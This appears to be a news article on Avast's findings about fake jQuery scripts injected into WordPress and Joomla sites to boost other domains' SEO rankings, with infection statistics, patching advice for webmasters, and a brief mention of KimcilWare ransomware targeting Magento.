According to cybersecurity firm Avast, fake jQuery injections have become a very popular attack of late. In a blog post, the team said a particular attack method which has surged in popularity over the past few months includes the use of a fake jQuery script injected into the head section of websites powered by the WordPress and Joomla content management systems, leading to a web of infection supported by compromised and malicious domains.
When codes are particularly complex, drawing on these kinds of libraries can make the job easier, but in turn, some features in the jQuery library are open to abuse for the purpose of cyberattack campaigns on a large scale.
According to the researchers, fake jQuery scripts have been found in almost 70 million unique files on compromised websites. Since November 2015, a total of 4.5 million users have encountered infected websites due to the “abnormally high” number of compromised domains, researchers say.
The threat actors behind this campaign have ensured the code starts with a 10 milliseconds countdown, a common practice in injection types of attacks — although a longer delay is more typical. The code then uses the “encodeURIComponent” feature, which encodes special characters such as ?, : and @.
“The final condition checks if variables contain necessary values and after evaluation another source for script is inserted,” the researchers explained.
Once injected, the code then is used to increase the SEO rank of other domains, which could not only spread the infection further by boosting compromised websites but may make cybercriminals money by pushing up ad-based domains or for kinds of fraud such as fake domains.
The main sources of infection are below.
Webmasters should not only clear their local machines to make sure there are no infections at home but should also perform regular scans on their websites and keep WordPress and Joomla builds up-to-date to protect themselves as much as possible from online threats.
Last week, researchers revealed that the Magento e-commerce platform has become the latest target for the KimcilWare ransomware. While not sophisticated and built upon code released as an educational tool, the malware is still able to compromise domains and demand payment from webmasters to restore functionality to websites.